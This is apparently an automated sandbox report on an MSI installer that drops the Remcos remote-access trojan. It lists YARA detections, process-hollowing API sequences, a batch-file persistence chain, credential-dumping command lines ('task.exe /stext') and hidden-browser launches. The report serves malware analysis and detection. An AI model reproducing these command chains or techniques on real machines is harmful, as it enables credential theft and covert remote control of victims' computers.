                  Source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                  Source: C:\Users\user\task.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Memory allocated: 75760000 page execute and read and write
                  Source: C:\Users\user\task.exe Memory allocated: 75760000 page execute and read and write
                  Source: C:\Users\user\task.exe Memory allocated: 75760000 page execute and read and write
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DC7F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,8_2_6C8DC7F0
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DC910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,8_2_6C8DC910
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7C7F0 NtReadFile,WaitForSingleObject,RtlNtStatusToDosError,22_2_6FE7C7F0
                  Source: C:\Users\user\task.exeCode function: 22_2_6FE7C910 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,22_2_6FE7C910
                  Source: C:\Users\user\task.exeCode function: 22_2_00076447 GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,22_2_00076447
                  Source: C:\Users\user\task.exeCode function: 22_2_00071673 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,22_2_00071673
                  Source: C:\Users\user\task.exeCode function: 22_2_00079CD4 OpenProcess,NtSuspendProcess,CloseHandle,22_2_00079CD4
                  Source: C:\Users\user\task.exeCode function: 22_2_00079D00 OpenProcess,NtResumeProcess,CloseHandle,22_2_00079D00
                  Source: C:\Users\user\task.exeCode function: 24_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,24_2_0040DD85
                  Source: C:\Users\user\task.exeCode function: 24_2_00401806 NtdllDefWindowProc_W,24_2_00401806
                  Source: C:\Users\user\task.exeCode function: 24_2_004018C0 NtdllDefWindowProc_W,24_2_004018C0
                  Source: C:\Users\user\task.exeCode function: 22_2_00074B45 ExitWindowsEx,LoadLibraryA,GetProcAddress,22_2_00074B45
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\434f23.msi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{0028494D-9E28-4DD9-A336-17E8D634DF88}
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                  Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI509A.tmp
                  Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI509A.tmp
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\775b62a938f64659aead6abedaf63071$dpx$.tmp\67a1ae3c4a36f34f89fd14e4fff5e74c.tmp 796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: String function: 6C8F12B0 appears 36 times
                  Source: C:\Users\user\task.exeCode function: String function: 004169A7 appears 87 times
                  Source: C:\Users\user\task.exeCode function: String function: 004165FF appears 35 times
                  Source: C:\Users\user\task.exeCode function: String function: 6FE912B0 appears 36 times
                  Source: C:\Users\user\task.exeCode function: String function: 000620BD appears 46 times
                  Source: C:\Users\user\task.exeCode function: String function: 00092100 appears 42 times
                  Source: C:\Users\user\task.exeCode function: String function: 02581B6B appears 41 times
                  Source: C:\Users\user\task.exeCode function: String function: 0258224B appears 47 times
                  Source: C:\Users\user\task.exeCode function: String function: 00061E82 appears 33 times
                  Source: C:\Users\user\task.exeCode function: String function: 000927E0 appears 54 times
                  Source: C:\Users\user\task.exeCode function: String function: 0044DB70 appears 41 times
                  Source: C:\Users\user\task.exeCode function: String function: 00416760 appears 69 times
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976
                  Source: 22.2.task.exe.255066b.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.2.task.exe.255066b.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.task.exe.6066b.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 22.2.task.exe.60000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.task.exe.120000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 30.2.task.exe.6066b.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 00000008.00000002.1571921794.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.evad.winMSI@70/148@12/12
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeCode function: 8_2_6C8DCAF0 GetModuleHandleW,FormatMessageW,GetLastError,8_2_6C8DCAF0
                  Source: C:\Users\user\task.exeCode function: 22_2_00075C8A GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,22_2_00075C8A
                  Source: C:\Users\user\task.exeCode function: 24_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,24_2_00418758
                  Source: C:\Users\user\task.exeCode function: 22_2_0006E45A CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,22_2_0006E45A
                  Source: C:\Users\user\task.exeCode function: 22_2_00079789 FindResourceA,LoadResource,LockResource,SizeofResource,22_2_00079789
                  Source: C:\Users\user\task.exeCode function: 22_2_00078D0C OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,22_2_00078D0C
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeFile created: C:\Users\user\apps.batJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMutant created: \Sessions\1\BaseNamedObjects\zRRdyPN41SkDaS8h3
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7880
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4212:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7832:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
                  Source: C:\Users\user\task.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-RNN6CM
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
                  Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-a34ef0fe-40fa-1ddbcb-aeea2ee60c14}
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF218C22ED6F4C8576.TMPJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Users\user\task.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\msiwrapper.iniJump to behavior
                  Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmp, task.exe, 0000001A.00000002.1666220432.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: task.exe, 00000016.00000002.4496169757.0000000002FF0000.00000040.10000000.00040000.00000000.sdmp, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: task.exe, 00000018.00000002.1685578220.0000000002736000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1879011150.000001BE85C37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1878511893.000001BE85617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000020.00000003.1903680405.000001BE85617000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: task.exe, task.exe, 00000018.00000002.1684002660.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: wE1inOhJA5.msiReversingLabs: Detection: 44%
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\wE1inOhJA5.msi"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding E1280F90D0867DD413F7EEEF5D19EFB6
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                  Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                  Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe"
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7880 -s 976
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\gifwhgt"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\jckohyeeyyu"
                  Source: C:\Users\user\task.exeProcess created: C:\Users\user\task.exe C:\Users\user\task.exe /stext "C:\Users\user\AppData\Local\Temp\tfphirpfmgmayj"
                  Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\apps.bat" "
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\task.exe "task.exe"
                  Source: C:\Users\user\task.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrFE01.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/6c77fc35"
                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2480 --field-trial-handle=2376,i,16818295695986717264,7118115118329945779,262144 /prefetch:8
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6BC.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/10d9defc/32916e99"
                  Source: C:\Windows\System32\conhost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
                  Source: C:\Program Files\Windows Media Player\wmplayer.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2640 --field-trial-handle=2100,i,4541570122865520646,14461282582081406380,262144 /prefetch:3
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll, netutils.dll, srclient.dll, spp.dll, powrprof.dll, vssapi.dll, vsstrace.dll, umpdc.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, gpapi.dll, mscoree.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, windows.storage.dll, pcacli.dll, mpr.dll, ntmarta.dll
                  Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, kernel.appcore.dll, msi.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, uxtheme.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll
                  Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
                  Source: C:\Windows\SysWOW64\expand.exe Section loaded: cabinet.dll, dpx.dll, cryptsp.dll, wdscore.dll, dbghelp.dll, dbgcore.dll, rsaenh.dll, cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\MW-70394d6c-f51f-472d-a6f7-915654cf9b1e\files\task.exe Section loaded: apphelp.dll, g2m.dll, wininet.dll, mscoree.dll, amsi.dll, kernel.appcore.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, userenv.dll, profapi.dll, version.dll, uxtheme.dll, windows.storage.dll, propsys.dll, windows.staterepositoryps.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll, kernel.appcore.dll, uxtheme.dll, windows.storage.dll, wldp.dll, propsys.dll, ndfapi.dll, wdi.dll, iphlpapi.dll, duser.dll, xmllite.dll, atlthunk.dll, textshaping.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll
                  Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll, apphelp.dll
                  Source: C:\Windows\SysWOW64\icacls.exe Section loaded: ntmarta.dll
